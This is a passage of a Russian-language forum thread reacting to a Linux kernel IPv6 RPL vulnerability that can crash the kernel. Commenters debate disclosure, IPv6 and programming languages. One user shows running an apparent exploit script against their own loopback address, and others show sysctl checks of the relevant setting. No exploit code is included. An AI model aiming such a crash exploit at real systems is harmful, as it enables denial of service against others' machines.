    > Это внутренняя кухня, а пользователи в этом не виноваты. В результате они
    > получили уязвимость. Проинформировать можно было и после закрытия уязвимости.

    Уязвимость возникла в момент написания (точнее, принятия в основную ветку) кода, то есть существовала до того, как исследователи её нашли и тем более открыли. Если не понимаете этот момент, лучше воздержитесь от оценки действий специалистов.

     
     
  • 7.309, Вы забыли заполнить поле Name (?), 21:42, 22/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    >[оверквотинг удален]
    >>>>> опубликовали информацию. Вроде всё по канонам. Нет?
    >>>> Нет, уязвимость не была закрыта.
    >>> Если трёх исправлений для закрытия недостаточно, значит впору ставить под сомнение профпригодность
    >>> и проинформировать пользователей.
    >> Это внутренняя кухня, а пользователи в этом не виноваты. В результате они
    >> получили уязвимость. Проинформировать можно было и после закрытия уязвимости.
    > Уязвимость возникла в момент написания (точнее, принятия в основную ветку) кода, то
    > есть существовала до того, как исследователи её нашли и тем более
    > открыли. Если не понимаете этот момент, лучше воздержитесь от оценки действий
    > специалистов.

    Эмм... Вообще-то все уязвимости существуют до того как их находят.

     
     
  • 8.311, n00by (ok), 07:01, 23/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    gt оверквотинг удален Нет, не все Некоторые внедряются ... текст свёрнут, показать
     

  • 1.83, YetAnotherOnanym (ok), 12:15, 17/05/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    А вот нефиг пихать в уровень IP обработку потери датаграмм.
     
     
  • 2.89, Аноним (128), 12:25, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Потому что это не микроядро.
     
     
  • 3.192, Аноним (206), 22:31, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    На уровне IP пакеты ходят. Потери пакетов отслеживает TCP.
     

  • 1.96, Аноним (96), 12:55, 17/05/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    попробовал этот эксплойт не работает на моем пека..
     
     
  • 2.193, Аноним (206), 22:33, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    В моем ядре 4.19 вообще нет параметра отвечающего за это.
     
  • 2.230, Аноним (-), 01:52, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > попробовал этот эксплойт не работает на моем пека..

    Да у тебя поди и этот экзотичный протоколец не включен.

    Обычный линуксный эксплойт, сперва зарядите пистолет, наведите на пятку, нажмите на спуск, и вот тогда уже можно выть "ааа, мерзавцы, самострелов понаставили!"

     

  • 1.102, Ilya Indigo (ok), 13:14, 17/05/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    100500 всяких разных устройств на которых нет вообще возможности обновления будут подвержены её вечно!
     
     
  • 2.113, Аноним (19), 14:18, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • –2 +/
    > 100500 всяких разных устройств на которых нет вообще возможности обновления будут подвержены её вечно!

    на таких устройствах IPv6 и RPL не включен, но ты уже можешь бежать за растом - он лечит от всего ога, только его самого не принимали в ядро из-за паник на каждый чих.

     
     
  • 3.121, Ilya Indigo (ok), 15:03, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +2 +/
    > на таких устройствах IPv6 и RPL не включен

    Сильное заявление!
    Проверять мы его, конечно же, НЕ будем!

    > бежать за растом

    Причём тут вообще раст?

     
     
  • 4.131, Аноним (19), 15:22, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • –3 +/
    > Проверять мы его, конечно же, НЕ будем!

    давай ты сначала пруф приведёшь про устройства которые не обновляются с RPL. Хотя бы одно.

    > Причём тут вообще раст?

    по аватаре видно что ты из этих :)

     
     
  • 5.138, Аноним (19), 15:55, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > Проверять мы его, конечно же, НЕ будем!

    вот на всякий случай

    https://elixir.bootlin.com/linux/latest/source/net/ipv6/addrconf.c#L233

    https://elixir.bootlin.com/linux/latest/source/net/ipv6/addrconf.c#L293

    если ты его специально не включишь в рантайме, по дефолту он отключен.

     
     
  • 6.231, Аноним (-), 01:54, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > если ты его специально не включишь в рантайме, по дефолту он отключен.

    Пришел аноним и обломал паникерам весь кайф. Спасибо за аналитику анон, такие как ты делают посещение ресурса имеющим смысл.


     
  • 4.183, Аноним (206), 21:03, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > Причём тут вообще раст?

    Кому-то удобно валить в одно место.

     
  • 3.182, Аноним (206), 21:01, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    В rust такая ситуация: если есть желания обрабатывать исключения и "панику", то возможность есть.
    Но можно и игнорировать обработку. Поэтому вопрос к писателям, а не к rust.
     
     
  • 4.215, Аноним (216), 00:22, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Какое удобное перекладывание ответственности, все как обычно.
     

  • 1.109, Шарп (ok), 13:58, 17/05/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    >три раза попытались устранить проблему

    Деды не смогли. А что Титов^W академики из FreeBSD?

     
  • 1.119, Аноним (108), 14:32, 17/05/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    >срабатывает проверка на несоразмерность размера данных и буфера, генерирующая состояние panic, чтобы предотвратить запись за границу буфера

    Нет бы, чтобы просто послать такой принятый пакет в игнор.

     
     
  • 2.130, 1 (??), 15:22, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Это ж обработчик надо писать - а так в паник и все дела
     

  • 1.135, xsignal (ok), 15:37, 17/05/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    WinNuke for Linux?
     
  • 1.145, Профессор (?), 16:21, 17/05/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    Нашли таки эту закладку. "А ты говоришь, зачем багор")
     
     
  • 2.157, Аноним (157), 17:43, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Таков путь.
     
  • 2.240, mos87 (ok), 07:59, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    закладка крашит сильно ограниченный набор устройств?
    очень важная да, обнулили мОссад, опять.
     

  • 1.173, Аноним (173), 19:11, 17/05/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Ой, а что это все орут то...
    Вот ведь, С-программисты таки сделали как в ржваом, запись за пределы буфера уже не производится. И уже давно, года полтора как минимум...
     
     
  • 2.175, Анонин (?), 20:16, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    А тогда где тут перехват паники, если хотите как в ржавом?
     

  • 1.180, Аноним (206), 20:56, 17/05/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Единое адресное пространство IPV6 без провайдеров существует?
     
     
  • 2.187, Аноним (278), 22:04, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Конечно! FC00::/7. Бери любые, сколько душе угодно.
     
     
  • 3.198, Аноним (206), 23:03, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > Конечно! FC00::/7. Бери любые, сколько душе угодно.

    Уникальный локальный адрес (ULA) [1] — это адрес Интернет-протокола версии 6 (IPv6) в диапазоне адресов fc00::/7.[2] Эти адреса доступны не глобально[3] (маршрутизируются только в рамках частных сетей, но не в глобальном Интернете IPv6). По этой причине ULA несколько аналогичны адресации частной сети IPv4, но со значительными отличиями. Уникальные локальные адреса могут использоваться свободно, без централизованной регистрации, внутри одного сайта или организации или охватывать ограниченное количество сайтов или организаций.

    Это аналогично 169.254.0.0/16 для IPV4? Как к нему относятся роутеры провайдера?

     

  • 1.208, nevlezay80 (ok), 23:53, 17/05/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    я проверил, у меня ядро не падает.

    [root@arch user]# python3.11 /tmp/a.py ::1 && echo "Жив!"
    Жив!
    [root@arch user]# uname -r
    6.3.1-arch1-1

    [root@arch user]# sysctl -a|grep rpl_seg_enable
    net.ipv6.conf.all.rpl_seg_enabled = 1
    net.ipv6.conf.default.rpl_seg_enabled = 0
    net.ipv6.conf.ens3.rpl_seg_enabled = 0
    net.ipv6.conf.lo.rpl_seg_enabled = 1

     
  • 1.233, WatchCat (ok), 02:09, 18/05/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    Язык ADA,сделаный специально для написания высоконадежных программ, на момент со... большой текст свёрнут, показать
     
     
  • 2.238, Аноним (238), 07:20, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    а расскажите, что есть написанного на ада, что реально работает?
     
     
  • 3.241, mos87 (ok), 08:00, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • –1 +/
    АДА нужно примерно так же как эта портянка.
     
     
  • 4.273, WatchCat (ok), 13:10, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > АДА нужно примерно так же как эта портянка.

    Если вам в вашей работе Ада не нужна - так ведь никто и не заставляет. Я же не говорю что например Лисп не нужен только потому что его не использую и не понимаю чем он хорош. Когда в конце 90х у меня на работе был выбор на чем сервер делать - кое-кто из коллег тоже не понимал чего это я агитирую за использование любой из доступных юникс-подобных ОС,называя их "устаревшими".Восхвалял модное новейшее WinNT.
    А теперь вот серверы на юниксообразных ОС у большинства стоят.
    Новое - это далеко не всегда лучшее. Особенно сейчас.


     
  • 3.270, WatchCat (ok), 13:02, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Наиболее известное из отечественного - бортовое программное обеспечение самолёта... большой текст свёрнут, показать
     
     
  • 4.283, Аноним (275), 18:28, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Ого! Спасибо за подробный комментарий! Моё почтение!
     
  • 4.324, Карлос Сношайтилис (ok), 09:50, 29/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > самолёта Бе-200. Самолёт успешно летает. В отличие от Боинг 737 MAX

    Показатель аварийности 737 MAX: 0.2 на миллион полётов
    Показатель аварийности Бе-200: хз, но если предположить, что все самолёты за 20 лет эксплуатации летаю по 10 раз в день (что точно не так, но всё же), то показатель аварийности будет 13. А ближе к реальности: 130, то есть на три-четыре порядка хуже чем у боинга.

    "успешно летает", да.

     
  • 2.247, 1 (??), 09:13, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > Хотя это мой любимый язык как раз с тех времен,но и я не скажу что знаю его идеально.

    В АНБ работал ?

    Насколько я помню, по ADA было всего несколько книг (даже одну перевели на русский язык). Компилятора, вживую, я не видАл. И потом, как ADA взяли на вооружение спецслужбы США, о ней вообще не было публикаций ... А вот поди ж ты - прошло 30лет и вспомнили старушку.

     
  • 2.261, Аноним (261), 11:39, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Потому что ...
      ... сейфовая дверь не защитит ни от пивной бутылки по башке, ни от людей в погонах.
     
     
  • 3.272, WatchCat (ok), 13:06, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    >   ... сейфовая дверь не защитит ни от пивной бутылки по
    > башке, ни от людей в погонах.

    А хорошо настроенная защита своих устройств вполне защитит от каких-нибудь малолетних хакеров с комплексом Герострата в голове.

     

  • 1.239, mos87 (ok), 07:56, 18/05/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    >Проблема проявляется только при

    как обычно. расходимся.

     
     
  • 2.242, nevlezay80 (ok), 08:19, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    ничего не мешает запустить rpl например в контейнерах
     

  • 1.250, Аноним (250), 09:30, 18/05/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    # uname -a
    Linux exe 5.10.0-19-686 #1 SMP Debian 5.10.149-2 (2022-10-21) i686 GNU/Linux
    # sysctl -a | grep -i rpl_seg_enabled
    net.ipv6.conf.all.rpl_seg_enabled = 0
    net.ipv6.conf.default.rpl_seg_enabled = 0
    net.ipv6.conf.eth0.rpl_seg_enabled = 0
    net.ipv6.conf.lo.rpl_seg_enabled = 0


    Опять мой 4 пень в безопасности сидит на диване ...

     
  • 1.274, onanim (?), 13:28, 18/05/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    напомните, зачем нужен IPv6?
     
     
  • 2.282, Аноним (275), 18:22, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Ну типа на заре интернета 90% всех ip-адресов поделили между микрософтом, саном и гуглом. А с распространением интернета остальные тоже захотели себе ip-адрес. И адресов стало не хватать (не отбирать же у перечисленных бояр). Потом корпорации решили, что хорошо бы и холодильникам/утюгам/выдвижным ящикам с носками тоже давать белые ip-адреса. Придумали сделать столько адресов, чтоб каждая травинка на планете могла иметь свой. Заодно попытались решить некоторые из проблем, обнаруженных в процессе эксплуатации ipv4. Ну и вот теперь (лет 15 уже, наверное) пытаются взлететь со всем этим.
     
  • 2.291, WatchCat (ok), 23:48, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > напомните, зачем нужен IPv6?

    Например я его использую для доступа снаружи на свой комп,находящийся за NATом сотового оператора.
    Даже домашний сайт сделал "для своих". В смысле - физически находящийся дома. Доступ - по IPv6 через teredo и динамический днс. Вполне работоспособно в рамках поставленной задачи. А также с другого компа где тоже запущено teredo можно зайти к себе домой по ssh. Мелочь,а приятно.

     
     
  • 3.299, onanim (?), 08:21, 20/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    >> напомните, зачем нужен IPv6?
    > Например я его использую для доступа снаружи на свой комп,находящийся за NATом
    > сотового оператора.
    > Даже домашний сайт сделал "для своих". В смысле - физически находящийся дома.
    > Доступ - по IPv6 через teredo и динамический днс. Вполне работоспособно
    > в рамках поставленной задачи. А также с другого компа где тоже
    > запущено teredo можно зайти к себе домой по ssh. Мелочь,а приятно.

    то есть оператор выдаёт серые IPv4, но белые IPv6?

     
     
  • 4.305, WatchCat (ok), 05:44, 22/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > то есть оператор выдаёт серые IPv4, но белые IPv6?

    Оператор(мегафон) вообще IPv6 не выдает.
    teredo - это туннель,позволяющий бесплатно получить IPv6 адрес.


     
     
  • 5.306, onanim (?), 10:47, 22/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    >> то есть оператор выдаёт серые IPv4, но белые IPv6?
    > Оператор(мегафон) вообще IPv6 не выдает.
    > teredo - это туннель,позволяющий бесплатно получить IPv6 адрес.

    всё равно не понимаю. ты используешь какой-то промежуточный сервер для подключения к своему компу за натом? чем это отличается от использования промежуточного сервера с IPv4?

     
     
  • 6.310, WatchCat (ok), 02:41, 23/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Если подключение по IPv6 через teredo то свой промежуточный сервер не нужен До... большой текст свёрнут, показать
     
     
  • 7.312, onanim (?), 14:28, 23/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    gt оверквотинг удален погуглил teredo - это обычный промежуточный сервер, как... большой текст свёрнут, показать
     
     
  • 8.313, WatchCat (ok), 16:29, 23/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Не совсем так В случае связи между двумя устройствами за NAT,трафик ходит именн... большой текст свёрнут, показать
     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2024 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру